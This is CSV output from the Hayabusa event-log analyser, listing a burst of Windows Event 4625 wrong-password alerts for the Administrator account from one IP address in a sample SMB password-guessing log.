2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
